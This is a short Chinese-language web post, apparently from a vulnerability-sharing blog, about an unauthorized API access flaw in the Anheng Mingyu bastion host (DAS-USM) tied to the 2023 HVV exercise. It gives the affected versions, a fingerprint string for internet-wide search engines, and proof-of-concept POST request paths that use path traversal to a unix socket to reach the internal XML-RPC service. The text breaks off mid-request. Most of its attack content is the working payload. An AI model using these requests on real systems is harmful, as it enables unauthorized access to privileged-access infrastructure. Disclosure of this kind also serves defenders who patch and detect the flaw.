网站首页
编程语言
数据库
系统相关
其他分享
编程问答
nday
2024-06-04
【nday】HVV2023 安恒明御堡垒机存在接口未授权
一、漏洞影响 2023.8前二、网络测绘 "明御运维审计与风险控制系统"三、漏洞复现验证POCpost/service/?unix:var/run/rpc/xmlrpc.sock|http://test/wsrpcPOST/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpcH